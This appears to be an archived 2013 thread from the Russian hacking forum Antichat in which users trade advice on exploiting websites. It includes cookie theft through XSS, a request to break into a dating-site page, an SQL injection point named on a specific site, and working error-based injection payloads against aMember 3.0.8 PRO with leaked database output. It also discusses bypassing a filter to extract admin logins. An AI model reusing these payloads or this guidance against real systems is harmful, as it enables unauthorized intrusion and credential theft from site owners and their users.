ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.04.2013, 15:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
210
Репутация:
0
|
|
Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?
|
|
|
|
11.04.2013, 15:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Xazarychi
Xazarychi said:
Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?
по идее дописуют жс код, подкидуют ссылку на уязвимость админу чтобы своровать куки(не спрашивай как, а просто ЗАЙДИ В ГУГЛ И ПОСМОТРИ, ТАМ СТАТЕЙ НА ЭТУ ТЕМУ МИЛИОНЫ), но в 99 процентов случаях просто забивают и ничего не делают, потому что, то админки нету, то связатся с админом невозможно, и вобще это такой гемор который в 90% случаев того не стоит.
|
|
|
|
11.04.2013, 16:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
260
Репутация:
0
|
|
Можно ли и как возломать НЕпосещаемую страницу на сайте знакомств Loveplanet?
|
|
|
|
11.04.2013, 20:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
639
Репутация:
5
|
|
Всем привет!
Подскажите можно из этого что нить извлечь
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//mlw-cardon.ru/check?domain=1'[/COLOR][/COLOR]
Havij v1.16 - не может подцепиться
А сам новичке не могу все время тот же результат |
|
|
|
11.04.2013, 21:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
118953
Репутация:
37
|
|
как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/
удаленный инклуд не просматривается, хотя и очевиден =(
но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше
|
|
|
|
11.04.2013, 21:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
639
Репутация:
5
|
|
Сообщение от \/IRUS
\/IRUS said:
как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/
удаленный инклуд не просматривается, хотя и очевиден =(
но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше
Спасибо это было очевидно!
Но от помощи раскрыть sql не откажусь
|
|
|
|
12.04.2013, 01:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
728
Репутация:
0
|
|
фильтр таблицы
привет всем !
нужна помощь в обходе фильтра на знак '_'
уязвимый код
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'year_month'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'%02d'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]-[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]-01"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$dat2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Y-m-t'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#007700"]));
...........
[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT DAYOFMONTH(ac.date), COUNT(commission_id),
SUM(IF(record_type='debit', amount, 0)),
SUM(IF(record_type='credit', amount, 0)),
SUM(IF(record_type='debit', 1, 0))
FROM[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]aff_commission ac
WHERE aff_id=[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#DD0000"]AND ac.date BETWEEN '[/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#DD0000"]' AND '[/COLOR][COLOR="#0000BB"]$dat2[/COLOR][COLOR="#DD0000"]'
GROUP BY DAYOFMONTH(ac.date)
"[/COLOR][COLOR="#007700"]);
...........
[/COLOR][/COLOR]
запрос который у меня вышел
Сообщение от None
?year_month=2013-01-01' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
в ответ получил
MYSQL ERROR:
Duplicate entry 'support_memuser@localhost:5.5.23-55:support_memb1' for key 'group_key'
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- -01-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)
Сообщение от None
?year_month=2013-01-01' and(select 1 from(select count(*),concat((select login from
member_admins
limit 0,1),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
ну и в ответ соответственно
MYSQL ERROR:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)' at line 6
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat((select login
from member-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)
можно ли каким то образом обойти такой фильтр???
зашифровать?
чтото типа
Код:
Code:
SELECT * FROM (SELECT 0x7461626c655f6e616d65) AS t2
да и к стати это уязвимость в aMember 3.0.8 PRO в фаиле aff.php
|
|
|
|
12.04.2013, 05:41
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от None
привет всем !
нужна помощь в обходе фильтра на знак '_'
select login from member_admins
select login from member%5fadmins
select login from member%255fadmins
|
|
|
12.04.2013, 17:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
250
Репутация:
0
|
|
SQLMAP
SQL-иньекция определила, что dbms - Microsoft Access! Но имя ее не может вытащить! Если пытаться посмотреть список таблиц то у всех название _fil! Кто сталкивался с такой проблемой? НУЖНА ПОМОЩЬ! Скрины прилагаются
 |
|
|
|
13.04.2013, 01:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
728
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
select login from member_admins
select login from member%5fadmins
select login from member%255fadmins
тут это не поможет так %5f при обработке превращается в '_' и
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'year_month'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
его рубит
надо ка кто выполнить запрос вообще без этого знака
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
